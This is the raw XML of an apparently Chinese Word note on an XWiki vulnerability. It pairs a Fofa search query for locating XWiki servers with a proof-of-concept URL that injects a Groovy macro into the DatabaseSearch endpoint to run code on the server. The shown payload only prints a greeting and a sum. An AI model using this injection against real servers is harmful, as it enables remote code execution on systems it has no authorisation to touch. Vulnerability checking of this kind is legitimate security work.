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51638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Fofa语法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE27BB8"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body="data-</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>xwiki-</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>reference"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196723C1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漏洞POC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254A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B4D7737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http://ip/xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&amp;text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13E8145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1MmRmNDMwNTY5OTYyNDM2N2VjMmMzMjg5NmJjMmQifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="57FD1524"/>
    <w:rsid w:val="00B4047C"/>
    <w:rsid w:val="0E6B247B"/>
    <w:rsid w:val="0FF7FEA5"/>
    <w:rsid w:val="13DFAD20"/>
    <w:rsid w:val="1785A926"/>
    <w:rsid w:val="17E55D5F"/>
    <w:rsid w:val="1B97CA72"/>
    <w:rsid w:val="1E7A3B29"/>
    <w:rsid w:val="1F5F8E86"/>
    <w:rsid w:val="1F9F2A16"/>
    <w:rsid w:val="1FF3D49F"/>
    <w:rsid w:val="1FFF89E9"/>
    <w:rsid w:val="299F9458"/>
    <w:rsid w:val="29F99800"/>
    <w:rsid w:val="2BBE0817"/>
    <w:rsid w:val="2BFF4FB5"/>
    <w:rsid w:val="2BFF5176"/>
    <w:rsid w:val="2DB5FEFB"/>
    <w:rsid w:val="2DD27B69"/>
    <w:rsid w:val="2DD34CCD"/>
    <w:rsid w:val="2DD5B0C0"/>
    <w:rsid w:val="2EFF020B"/>
    <w:rsid w:val="2FBFBFFB"/>
    <w:rsid w:val="2FDF3766"/>
    <w:rsid w:val="2FFF4B20"/>
    <w:rsid w:val="33397BD2"/>
    <w:rsid w:val="37D79716"/>
    <w:rsid w:val="37EE8CD9"/>
    <w:rsid w:val="37F82425"/>
    <w:rsid w:val="37FF2A93"/>
    <w:rsid w:val="37FF9796"/>
    <w:rsid w:val="387F2B36"/>
    <w:rsid w:val="3AB73EF0"/>
    <w:rsid w:val="3BDFC0B7"/>
    <w:rsid w:val="3C93886E"/>
    <w:rsid w:val="3CEF9AF8"/>
    <w:rsid w:val="3D79E67D"/>
    <w:rsid w:val="3EB31C8B"/>
    <w:rsid w:val="3EFC37B8"/>
    <w:rsid w:val="3EFFD843"/>
    <w:rsid w:val="3FBFCB8B"/>
    <w:rsid w:val="3FDEA6AA"/>
    <w:rsid w:val="3FEB3B3D"/>
    <w:rsid w:val="3FF80E9F"/>
    <w:rsid w:val="3FFCDE76"/>
    <w:rsid w:val="418F03C1"/>
    <w:rsid w:val="42FD4AE6"/>
    <w:rsid w:val="468F1EA4"/>
    <w:rsid w:val="48D5008D"/>
    <w:rsid w:val="49E73956"/>
    <w:rsid w:val="4F4E1CE2"/>
    <w:rsid w:val="4FDCCC2A"/>
    <w:rsid w:val="4FF7A29A"/>
    <w:rsid w:val="4FFB5482"/>
    <w:rsid w:val="524E74B2"/>
    <w:rsid w:val="53E3D198"/>
    <w:rsid w:val="54FD31BC"/>
    <w:rsid w:val="55BF7986"/>
    <w:rsid w:val="55EBD72F"/>
    <w:rsid w:val="56E7394D"/>
    <w:rsid w:val="57771623"/>
    <w:rsid w:val="577BEC18"/>
    <w:rsid w:val="57FD1524"/>
    <w:rsid w:val="5AFD7C30"/>
    <w:rsid w:val="5B6E52F5"/>
    <w:rsid w:val="5BCDD2E7"/>
    <w:rsid w:val="5BD77C15"/>
    <w:rsid w:val="5BFD9482"/>
    <w:rsid w:val="5D7B3FBC"/>
    <w:rsid w:val="5DFB9FF8"/>
    <w:rsid w:val="5EEB849B"/>
    <w:rsid w:val="5EFD149D"/>
    <w:rsid w:val="5F7A13AB"/>
    <w:rsid w:val="5F7F0FB8"/>
    <w:rsid w:val="5FBF167B"/>
    <w:rsid w:val="5FED12B8"/>
    <w:rsid w:val="5FF1F784"/>
    <w:rsid w:val="5FF3E307"/>
    <w:rsid w:val="60238493"/>
    <w:rsid w:val="617F880E"/>
    <w:rsid w:val="61853D5A"/>
    <w:rsid w:val="63DBC652"/>
    <w:rsid w:val="65FF423B"/>
    <w:rsid w:val="6690A103"/>
    <w:rsid w:val="67E7CB12"/>
    <w:rsid w:val="67FF23E7"/>
    <w:rsid w:val="67FFF15E"/>
    <w:rsid w:val="684F53CA"/>
    <w:rsid w:val="6B54702E"/>
    <w:rsid w:val="6BBB4FAF"/>
    <w:rsid w:val="6BCDD5AF"/>
    <w:rsid w:val="6BDF1674"/>
    <w:rsid w:val="6BF3A92F"/>
    <w:rsid w:val="6D7E2FFF"/>
    <w:rsid w:val="6DB22A8C"/>
    <w:rsid w:val="6EBBFE9E"/>
    <w:rsid w:val="6EF70D5B"/>
    <w:rsid w:val="6EFB71B1"/>
    <w:rsid w:val="6EFE788C"/>
    <w:rsid w:val="6F6F2774"/>
    <w:rsid w:val="6FBD7CF2"/>
    <w:rsid w:val="6FE75C91"/>
    <w:rsid w:val="6FEE5854"/>
    <w:rsid w:val="7020421A"/>
    <w:rsid w:val="70B63205"/>
    <w:rsid w:val="72CFED86"/>
    <w:rsid w:val="73A9F55B"/>
    <w:rsid w:val="73C94D1C"/>
    <w:rsid w:val="73CBABE1"/>
    <w:rsid w:val="73DF1153"/>
    <w:rsid w:val="73FD6563"/>
    <w:rsid w:val="75FDE963"/>
    <w:rsid w:val="76BF7AB2"/>
    <w:rsid w:val="76C18528"/>
    <w:rsid w:val="76EB1E07"/>
    <w:rsid w:val="77E42D04"/>
    <w:rsid w:val="77FB1747"/>
    <w:rsid w:val="77FFE35A"/>
    <w:rsid w:val="785F0ADD"/>
    <w:rsid w:val="7956CD3D"/>
    <w:rsid w:val="79FFF76A"/>
    <w:rsid w:val="7A7BBABE"/>
    <w:rsid w:val="7A95D0EB"/>
    <w:rsid w:val="7AD64DD6"/>
    <w:rsid w:val="7AF94817"/>
    <w:rsid w:val="7B3BD7E9"/>
    <w:rsid w:val="7B7A30CF"/>
    <w:rsid w:val="7B7B0B69"/>
    <w:rsid w:val="7B995757"/>
    <w:rsid w:val="7BADE33A"/>
    <w:rsid w:val="7BD7F576"/>
    <w:rsid w:val="7BF7E1F0"/>
    <w:rsid w:val="7BF7ECA9"/>
    <w:rsid w:val="7BFF60DD"/>
    <w:rsid w:val="7CD5C5D6"/>
    <w:rsid w:val="7CF6A534"/>
    <w:rsid w:val="7CF7A1BC"/>
    <w:rsid w:val="7D39CCA9"/>
    <w:rsid w:val="7D7FDF5C"/>
    <w:rsid w:val="7DFFA47E"/>
    <w:rsid w:val="7E6E81D2"/>
    <w:rsid w:val="7E78C45A"/>
    <w:rsid w:val="7E7BCD1C"/>
    <w:rsid w:val="7E7E60FB"/>
    <w:rsid w:val="7E9F6F51"/>
    <w:rsid w:val="7EAE9A02"/>
    <w:rsid w:val="7EBDF6C6"/>
    <w:rsid w:val="7EFC1F47"/>
    <w:rsid w:val="7EFDDE9E"/>
    <w:rsid w:val="7F26BCBA"/>
    <w:rsid w:val="7F376BCC"/>
    <w:rsid w:val="7F3E08FE"/>
    <w:rsid w:val="7F3F55B7"/>
    <w:rsid w:val="7F6F3B96"/>
    <w:rsid w:val="7F765816"/>
    <w:rsid w:val="7FAFBBCC"/>
    <w:rsid w:val="7FB3A4A5"/>
    <w:rsid w:val="7FB7D77D"/>
    <w:rsid w:val="7FBB719F"/>
    <w:rsid w:val="7FBEA1CB"/>
    <w:rsid w:val="7FCE339B"/>
    <w:rsid w:val="7FD73586"/>
    <w:rsid w:val="7FDB36B4"/>
    <w:rsid w:val="7FDB6353"/>
    <w:rsid w:val="7FDF2293"/>
    <w:rsid w:val="7FDF396C"/>
    <w:rsid w:val="7FE69C24"/>
    <w:rsid w:val="7FED6077"/>
    <w:rsid w:val="7FED80C6"/>
    <w:rsid w:val="7FEFB24F"/>
    <w:rsid w:val="7FF2849D"/>
    <w:rsid w:val="7FF52585"/>
    <w:rsid w:val="7FFAE25C"/>
    <w:rsid w:val="7FFDE5C5"/>
    <w:rsid w:val="7FFE79BD"/>
    <w:rsid w:val="7FFF692E"/>
    <w:rsid w:val="7FFFCBF4"/>
    <w:rsid w:val="7FFFE085"/>
    <w:rsid w:val="8AB78574"/>
    <w:rsid w:val="903BCFC1"/>
    <w:rsid w:val="93F99F0F"/>
    <w:rsid w:val="967B4632"/>
    <w:rsid w:val="97AE0B38"/>
    <w:rsid w:val="99FFFF3F"/>
    <w:rsid w:val="9AFD16AC"/>
    <w:rsid w:val="9BCF7D2B"/>
    <w:rsid w:val="9CFEACB1"/>
    <w:rsid w:val="9F7CD18D"/>
    <w:rsid w:val="9F9720AE"/>
    <w:rsid w:val="9FAF2B7F"/>
    <w:rsid w:val="9FDAB30B"/>
    <w:rsid w:val="9FFDAEBF"/>
    <w:rsid w:val="9FFF3431"/>
    <w:rsid w:val="A1FD5A70"/>
    <w:rsid w:val="A27E69B0"/>
    <w:rsid w:val="A3D3B5AD"/>
    <w:rsid w:val="A6FDCE76"/>
    <w:rsid w:val="A8FB678E"/>
    <w:rsid w:val="AD5B8CAC"/>
    <w:rsid w:val="AEFED516"/>
    <w:rsid w:val="AF47AD03"/>
    <w:rsid w:val="AFB6F41D"/>
    <w:rsid w:val="B0974690"/>
    <w:rsid w:val="B47F41C3"/>
    <w:rsid w:val="B53FB2C1"/>
    <w:rsid w:val="B73E3741"/>
    <w:rsid w:val="B7FF178E"/>
    <w:rsid w:val="B96C5A42"/>
    <w:rsid w:val="BB6E64CC"/>
    <w:rsid w:val="BDEE8467"/>
    <w:rsid w:val="BDFF1BC3"/>
    <w:rsid w:val="BDFF3D9F"/>
    <w:rsid w:val="BE77A9F7"/>
    <w:rsid w:val="BF5D1E32"/>
    <w:rsid w:val="BFB37021"/>
    <w:rsid w:val="BFF7428B"/>
    <w:rsid w:val="BFFEEB34"/>
    <w:rsid w:val="BFFFD0DE"/>
    <w:rsid w:val="BFFFFF57"/>
    <w:rsid w:val="C35F894E"/>
    <w:rsid w:val="C3FE21AB"/>
    <w:rsid w:val="C725C9FC"/>
    <w:rsid w:val="CAF582E6"/>
    <w:rsid w:val="CBBE2114"/>
    <w:rsid w:val="CBFF7C50"/>
    <w:rsid w:val="CD6FAFC1"/>
    <w:rsid w:val="CFDEC857"/>
    <w:rsid w:val="CFEB1D61"/>
    <w:rsid w:val="CFFA9BEF"/>
    <w:rsid w:val="CFFF237C"/>
    <w:rsid w:val="D47BD7E0"/>
    <w:rsid w:val="D7344563"/>
    <w:rsid w:val="D7B732F6"/>
    <w:rsid w:val="D8BF77E5"/>
    <w:rsid w:val="D9AD4A21"/>
    <w:rsid w:val="D9BBCE23"/>
    <w:rsid w:val="DBA4F869"/>
    <w:rsid w:val="DD7D3824"/>
    <w:rsid w:val="DDDFE8FB"/>
    <w:rsid w:val="DE7FDD73"/>
    <w:rsid w:val="DEF9DEED"/>
    <w:rsid w:val="DFCF9D82"/>
    <w:rsid w:val="DFF54C4B"/>
    <w:rsid w:val="DFF63828"/>
    <w:rsid w:val="DFFF08E0"/>
    <w:rsid w:val="DFFFC62C"/>
    <w:rsid w:val="E2DF4477"/>
    <w:rsid w:val="E59FF217"/>
    <w:rsid w:val="E77B0D1F"/>
    <w:rsid w:val="E79B4105"/>
    <w:rsid w:val="E7FA619A"/>
    <w:rsid w:val="E9ED6298"/>
    <w:rsid w:val="EB3FABDA"/>
    <w:rsid w:val="EB9F36C9"/>
    <w:rsid w:val="EBF91784"/>
    <w:rsid w:val="ECB7AB14"/>
    <w:rsid w:val="ECFE5741"/>
    <w:rsid w:val="EDBFE5F3"/>
    <w:rsid w:val="EE3F6450"/>
    <w:rsid w:val="EF7D3A8B"/>
    <w:rsid w:val="EFF9367F"/>
    <w:rsid w:val="EFFAC8C3"/>
    <w:rsid w:val="EFFF8005"/>
    <w:rsid w:val="EFFFA52C"/>
    <w:rsid w:val="EFFFAB75"/>
    <w:rsid w:val="F0FAAA88"/>
    <w:rsid w:val="F1FDE6F5"/>
    <w:rsid w:val="F1FF2A92"/>
    <w:rsid w:val="F27D5C03"/>
    <w:rsid w:val="F27FCA1F"/>
    <w:rsid w:val="F297FCDB"/>
    <w:rsid w:val="F3BF0145"/>
    <w:rsid w:val="F3FBB573"/>
    <w:rsid w:val="F4B7A44D"/>
    <w:rsid w:val="F57112A3"/>
    <w:rsid w:val="F5AB2C7D"/>
    <w:rsid w:val="F5B36BE9"/>
    <w:rsid w:val="F5BF77B4"/>
    <w:rsid w:val="F5F72DF8"/>
    <w:rsid w:val="F6273DA8"/>
    <w:rsid w:val="F6690D7E"/>
    <w:rsid w:val="F6FBF995"/>
    <w:rsid w:val="F76B3DD1"/>
    <w:rsid w:val="F7778859"/>
    <w:rsid w:val="F77FFC25"/>
    <w:rsid w:val="F79E8BA0"/>
    <w:rsid w:val="F7D95AD9"/>
    <w:rsid w:val="F7DB388E"/>
    <w:rsid w:val="F7E28B87"/>
    <w:rsid w:val="F7F5C8C0"/>
    <w:rsid w:val="F7FF6A77"/>
    <w:rsid w:val="F8BF8985"/>
    <w:rsid w:val="F97FB8ED"/>
    <w:rsid w:val="F9962060"/>
    <w:rsid w:val="F9CB2FFD"/>
    <w:rsid w:val="F9E62CBF"/>
    <w:rsid w:val="F9F3E506"/>
    <w:rsid w:val="F9F7F0EB"/>
    <w:rsid w:val="F9FF8D69"/>
    <w:rsid w:val="FA324E87"/>
    <w:rsid w:val="FAFBD3D7"/>
    <w:rsid w:val="FAFDEFD2"/>
    <w:rsid w:val="FAFEF8A2"/>
    <w:rsid w:val="FB5F0364"/>
    <w:rsid w:val="FBA30457"/>
    <w:rsid w:val="FBCB6F0D"/>
    <w:rsid w:val="FBEC3635"/>
    <w:rsid w:val="FBFB645F"/>
    <w:rsid w:val="FC7F72EA"/>
    <w:rsid w:val="FCF06FFB"/>
    <w:rsid w:val="FD1EE484"/>
    <w:rsid w:val="FD4FF5F1"/>
    <w:rsid w:val="FD6AEB77"/>
    <w:rsid w:val="FD7F4FD3"/>
    <w:rsid w:val="FD7F867D"/>
    <w:rsid w:val="FDADAFFC"/>
    <w:rsid w:val="FDB75070"/>
    <w:rsid w:val="FDBE7BD1"/>
    <w:rsid w:val="FDBFAA8F"/>
    <w:rsid w:val="FDBFD45E"/>
    <w:rsid w:val="FDEE5A13"/>
    <w:rsid w:val="FDF1F0A9"/>
    <w:rsid w:val="FDFBD708"/>
    <w:rsid w:val="FDFFBEF1"/>
    <w:rsid w:val="FE7B1328"/>
    <w:rsid w:val="FE9BFA22"/>
    <w:rsid w:val="FEDE071F"/>
    <w:rsid w:val="FEEBBCF6"/>
    <w:rsid w:val="FEF27B8B"/>
    <w:rsid w:val="FEFA3455"/>
    <w:rsid w:val="FEFC3A5C"/>
    <w:rsid w:val="FEFC4869"/>
    <w:rsid w:val="FF4FFC4C"/>
    <w:rsid w:val="FF5DA5AC"/>
    <w:rsid w:val="FF679AA1"/>
    <w:rsid w:val="FF6D89C7"/>
    <w:rsid w:val="FF7BC27C"/>
    <w:rsid w:val="FF7CA208"/>
    <w:rsid w:val="FF7FA203"/>
    <w:rsid w:val="FFBC1160"/>
    <w:rsid w:val="FFBCCD69"/>
    <w:rsid w:val="FFBDD75C"/>
    <w:rsid w:val="FFBF78FF"/>
    <w:rsid w:val="FFBF7C90"/>
    <w:rsid w:val="FFDEFE55"/>
    <w:rsid w:val="FFDF9E60"/>
    <w:rsid w:val="FFDFA1FC"/>
    <w:rsid w:val="FFDFC11F"/>
    <w:rsid w:val="FFE4EA8F"/>
    <w:rsid w:val="FFEF119A"/>
    <w:rsid w:val="FFF11AE6"/>
    <w:rsid w:val="FFF3FA3D"/>
    <w:rsid w:val="FFF7BF3C"/>
    <w:rsid w:val="FFF9B26C"/>
    <w:rsid w:val="FFFB349C"/>
    <w:rsid w:val="FFFB3EFB"/>
    <w:rsid w:val="FFFC469D"/>
    <w:rsid w:val="FFFC8503"/>
    <w:rsid w:val="FFFD6A02"/>
    <w:rsid w:val="FFFDF767"/>
    <w:rsid w:val="FFFE2F17"/>
    <w:rsid w:val="FFFF0078"/>
    <w:rsid w:val="FFFFE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494</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>521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2024-03-07T08:56:00Z</dcterms:created>
  <dc:creator>路边菜贩子</dc:creator>
  <cp:lastModifiedBy>W.CONG</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-21T11:45:15Z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239BAF64848D2AE6A9B1B1659314282A_41</vt:lpwstr>
  </property>
</Properties>
</file>